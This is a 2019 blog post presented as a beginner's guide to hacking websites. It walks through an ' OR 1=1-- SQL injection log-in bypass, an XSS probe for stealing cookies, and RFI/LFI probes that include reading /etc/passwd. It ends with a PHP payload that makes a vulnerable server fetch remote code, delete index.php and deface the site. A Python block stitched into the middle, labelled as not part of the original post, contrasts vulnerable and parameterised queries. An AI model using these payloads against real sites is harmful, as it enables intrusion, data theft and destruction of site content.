Sunday, July 21, 2019

Hacking Website Using SQL Injection (Basic)

In essence, a website is just a surface, a manifestation of data stored someplace else. So in hacking into a website you are essentially hacking into a server, some of the most secure entities in cyberspace (or not, depending on your luck). Sounds like fun? Remember that some of the most notorious hacks that made the headlines ran along these lines. And of course, successfully hacking a website takes a good deal of technical proficiency, especially in PHP and HTML.


SQL Injection

This is simply the act of injecting your own, home-brewed SQL commands into an
existing web-script, allowing you to manipulate the database however you wish. There are
different ways to use SQL injection:

  • Bypassing log-in verification
  • Adding a new Admin account
  • Lifting passwords
  • Lifting credit card information
  • Accessing any and every part of the database

Of course, these will only work if the SQL used in the website is vulnerable. An example is a log-in script that simply takes the username and password input (without filtering it) and compares it with the user's value from its database in order to check the input's validity. This might seem like a really simple-minded way of authenticating log-in credentials, but real programmers use it in real-world scenarios. Don't ask us why.

Step by Step Guide

To find out whether a certain script is injectable, simply enclose your input in quotation marks. If an error occurs, it is most likely injectable. If the page goes blank, it might still be injectable, but you will have to resort to blind SQL injection (which is never a walk in the park). If anything else happens, it is not injectable.

Let's say that we know the admin username: Administrator. Since the log-in system does not filter the input, we can simply insert anything into the statement. In a faulty script like the one described above, we can put ' OR 1=1-- in the password box. This will result in the following SQL query being run against the database:

SELECT IP FROM users WHERE username='Administrator' AND password='' OR 1=1--'

An OR only needs one of its conditions to be TRUE in order to succeed. Since 1=1 is always true, and the trailing -- comments out the rest of the line (including the stray closing quote), we end up with a syntactically valid query that matches regardless of the password.
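The quote probe and the ' OR 1=1-- bypass described above, as an added example that is not part of the original post: a throwaway SQLite database with constructed, hypothetical users, the faulty concatenated log-in check beside the same check written with bound parameters, so you can see which one the payload defeats.

```python
import sqlite3

# Constructed sample data (hypothetical values); the table follows the query
# quoted above: a users table with username, password and IP columns.
SAMPLE_USERS = [
    ("Administrator", "s3cret-admin-pw", "10.0.0.1"),
    ("alice", "alice-pw", "10.0.0.2"),
]

def make_db():
    """In-memory SQLite database holding the constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, ip TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn

def login_vulnerable(conn, username, password):
    """The faulty pattern from the text: input is pasted into the SQL string.
    Returns the IP of the first matching row, or None."""
    query = (f"SELECT ip FROM users WHERE username='{username}' "
             f"AND password='{password}'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None

def login_safe(conn, username, password):
    """Same check with bound parameters: the input travels as data, so quotes
    and -- inside it can never change the statement's structure."""
    row = conn.execute("SELECT ip FROM users WHERE username=? AND password=?",
                       (username, password)).fetchone()
    return row[0] if row else None

def errors_on_quote(login_fn, conn):
    """The probe from the text: does a lone quote in the password break the
    query? A syntax error is the tell-tale sign of concatenated SQL."""
    try:
        login_fn(conn, "Administrator", "'")
    except sqlite3.OperationalError:
        return True
    return False

if __name__ == "__main__":
    db = make_db()
    payload = "' OR 1=1--"  # the password-box input quoted on the page
    print(login_vulnerable(db, "Administrator", payload))  # 10.0.0.1
    print(login_safe(db, "Administrator", payload))  # None
    print(errors_on_quote(login_vulnerable, db))  # True
    print(errors_on_quote(login_safe, db))  # False
```

The parameterised version also keeps working for the real password, so the fix costs nothing but the habit of never building SQL text from user input.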

XSS (Cross-Site Scripting)

If you have been hanging around the Internet as much as you should have (to be a hacker, at least), you will at least have heard of this term. It allows the attacker's input to be sent to unwary victims. The primary use is cookie stealing (and no, not the kind your sadistic older sibling does). Once an attacker steals your cookie, under the right conditions they can log into the site it came from using your identity.

This vulnerability can be detected using the site's search facility. Try feeding it some HTML, such as "<font color=green>XSS</font>". If the word XSS comes up rendered, the site is vulnerable. Otherwise, you need to find a different way in.

RFI/LFI (Remote/Local File Include)

This is a type of vulnerability that allows a user to include remote or local files, which are then parsed and executed on the server.

To see if a certain website is vulnerable to this issue, try visiting "index.php?p=http://www.<DOMAIN NAME>.com/". If that site's content shows up, the page can be exploited with RFI. If something else appears, the site is not vulnerable to RFI; this does not necessarily mean it is safe from LFI, however. To verify, go for "index.php?p=/etc/passwd", assuming the server is running on a *nix-based system. If you can view the password file, the server is vulnerable to LFI. If something else appears, neither RFI nor LFI will work.

If the target is found to be vulnerable to RFI, you can make its server fetch and run PHP code of your own. Let's say you create the following in a file named hack.php:


<?php
// remove the site's front page, then replace it with a one-line message
unlink("index.php");
system("echo GOTCHA > index.php");
?>

Once you view "index.php?p=http://<DOMAIN NAME>.com/hack.php", the code will be run on the server. When this is done, the site will change to the simple GOTCHA message and none will be the wiser.